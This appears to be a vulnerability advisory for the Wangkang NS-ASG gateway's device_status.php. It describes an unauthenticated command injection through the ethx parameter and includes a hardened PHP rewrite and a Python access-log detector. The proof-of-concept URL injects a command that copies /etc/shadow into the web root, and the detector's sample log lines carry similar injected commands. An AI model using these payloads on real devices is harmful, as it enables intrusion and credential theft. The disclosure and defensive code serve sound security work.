Wangkang NS-ASG application security gateway Remote Command Execution
Remote commands can be executed directly, without logging in.
Vulnerability
<?php
include("include/common.inc");
include("./gadgets/lib/FusionCharts.php");
include("./gadgets/lib/Utilities.php");
// Authenticate($USER_ADMIN);   // the admin check is commented out, so every action below is reachable without logging in
switch ($action) {
    case "":
        list_group("");
        break;
    case "reboot":
        exec("sudo nohup /sbin/reboot &");
        list_group("");
        break;
    case "poweroff":
        exec("sudo /sbin/poweroff &");
        list_group("");
        break;
    case "getethinfo":
        $rtinfo = getRT($ethx);   // the vulnerability is triggered here: $ethx comes straight from the request; follow this function
        echo json_encode($rtinfo);
        break;
}

function getRT($eth = 'eth0') {
    $result = shell_exec("sudo /sbin/ifconfig $eth");   // $eth is interpolated into the command line unescaped and executed directly
    $ethinfo = array();
    preg_match("/RX packets:\d+/", $result, $rtarr);
    $ethinfo['rpackets'] = intval(substr($rtarr[0], 11));
    preg_match("/TX packets:\d+/", $result, $rtarr);
    $ethinfo['tpackets'] = intval(substr($rtarr[0], 11));
    preg_match("/RX bytes:\d+/", $result, $rtarr);
    $ethinfo['rbytes'] = intval(substr($rtarr[0], 9));
    preg_match("/TX bytes:\d+/", $result, $rtarr);
    $ethinfo['tbytes'] = intval(substr($rtarr[0], 9));
    return $ethinfo;
}
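Two defects combine in the code above: the admin check is commented out, and the interface name reaches shell_exec() unvalidated and unquoted. The following is an added example of a hardened rewrite of the getethinfo path; it is not Wangkang's code. It keeps the include files, Authenticate(), list_group() and the JSON output seen in the vulnerable file, and takes the parameter names action and ethx from the proof-of-concept URL; reading them from $_GET, the is_valid_ifname() helper and the 400 response are this example's own choices.

```php
<?php
// Added example, not the vendor's code: a hardened rewrite of the getethinfo
// path in device_status.php. Include files, Authenticate(), list_group() and
// the JSON output come from the page; the parameter names 'action' and 'ethx'
// come from the proof-of-concept URL; everything else is an assumption.
include("include/common.inc");
include("./gadgets/lib/FusionCharts.php");
include("./gadgets/lib/Utilities.php");

// 1. Run the admin check before dispatching ANY action. In the vulnerable
//    file this line was commented out, which is why no login was needed.
Authenticate($USER_ADMIN);

// 2. Take parameters from the request explicitly instead of relying on
//    register_globals to materialise $action and $ethx.
$action = isset($_GET['action']) ? (string)$_GET['action'] : '';
$ethx   = isset($_GET['ethx'])   ? (string)$_GET['ethx']   : 'eth0';

// 3. Allow-list: an interface name is a letter followed by letters/digits,
//    nothing else. Shell metacharacters such as | ; ` $ > can never pass.
function is_valid_ifname($name)
{
    return preg_match('/^[a-z][a-z0-9]{0,14}$/', $name) === 1;
}

// 4. Hardened getRT(): validate first, then still quote the argument with
//    escapeshellarg() so a later change to the pattern cannot reopen the hole.
function getRT($eth = 'eth0')
{
    if (!is_valid_ifname($eth)) {
        return null;
    }
    $result  = (string)shell_exec("sudo /sbin/ifconfig " . escapeshellarg($eth));
    $ethinfo = array();
    // Capture the counters with a group instead of fixed substr() offsets,
    // which depend on the exact spacing of the ifconfig output.
    $fields = array(
        'rpackets' => '/RX packets:\s*(\d+)/',
        'tpackets' => '/TX packets:\s*(\d+)/',
        'rbytes'   => '/RX bytes:\s*(\d+)/',
        'tbytes'   => '/TX bytes:\s*(\d+)/',
    );
    foreach ($fields as $key => $re) {
        $ethinfo[$key] = preg_match($re, $result, $m) ? intval($m[1]) : 0;
    }
    return $ethinfo;
}

switch ($action) {
    case 'getethinfo':
        $rtinfo = getRT($ethx);
        if ($rtinfo === null) {
            header('HTTP/1.1 400 Bad Request');
            echo json_encode(array('error' => 'invalid interface name'));
            break;
        }
        header('Content-Type: application/json');
        echo json_encode($rtinfo);
        break;
    // reboot/poweroff keep their original shape but, like everything else in
    // this file, are now only reachable after Authenticate() has passed.
    default:
        list_group('');
        break;
}
```

The allow-list is the real fix: once only [a-z0-9] can reach the command line there is nothing for the shell to interpret. escapeshellarg() is kept as a second layer, and restoring Authenticate() closes the reboot and poweroff branches at the same time, since they are just as unauthenticated in the original file.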
The verification method is as follows:
https://www.xxxxx.com/admin/device_status.php?action=getethinfo&ethx=a|cat /etc/shadow>/Isc/third-party/httpd/htdocs/test.php
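Because the request above is a plain GET, exploitation attempts leave a clear trace in the web server's access log: a call to device_status.php with action=getethinfo whose ethx value is not a bare interface name. The following added example (not part of the original advisory) scans combined-format access log lines for exactly that pattern; the log lines are constructed for the example, and the path and parameter names are taken from the proof-of-concept URL.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined/common log format: we only need the request target and status.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# A legitimate value for ethx is a bare interface name such as eth0 or br0.
IFNAME_RE = re.compile(r'^[a-z][a-z0-9]{0,14}$')

# Constructed sample lines (not from a real device): one benign request,
# two with shell metacharacters in ethx, one unrelated page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2014:10:00:00 +0800] "GET /admin/device_status.php?action=getethinfo&ethx=eth0 HTTP/1.1" 200 143',
    '10.0.0.9 - - [01/Jan/2014:10:00:07 +0800] "GET /admin/device_status.php?action=getethinfo&ethx=a|id HTTP/1.1" 200 58',
    '10.0.0.9 - - [01/Jan/2014:10:00:08 +0800] "GET /admin/device_status.php?action=getethinfo&ethx=a%7Ccat%20/etc/passwd HTTP/1.1" 200 58',
    '10.0.0.5 - - [01/Jan/2014:10:00:09 +0800] "GET /admin/index.php HTTP/1.1" 200 1020',
]


def check_request(target):
    """Return a reason string if the request target looks like an attempt to
    abuse the getethinfo handler, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/device_status.php'):
        return None
    # parse_qs percent-decodes values, so %7C becomes '|' before the check.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if 'getethinfo' not in qs.get('action', []):
        return None
    for value in qs.get('ethx', []):
        if not IFNAME_RE.match(value):
            return 'ethx is not a plain interface name: %r' % value
    return None


def scan_log(lines):
    """Return (target, reason) tuples for every suspicious request in lines."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        reason = check_request(m.group('target'))
        if reason:
            hits.append((m.group('target'), reason))
    return hits


def sample_hits():
    return scan_log(SAMPLE_LOG)


if __name__ == '__main__':
    for target, reason in sample_hits():
        print(target, '->', reason)
```

A status of 200 on a flagged line does not by itself prove success, but on this device the handler runs the command before echoing anything, so every flagged request should be treated as executed. Any new .php file under the document root dated after such a request is the follow-up check.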
Solution:
Was Wangkang's device written by a temp engineer?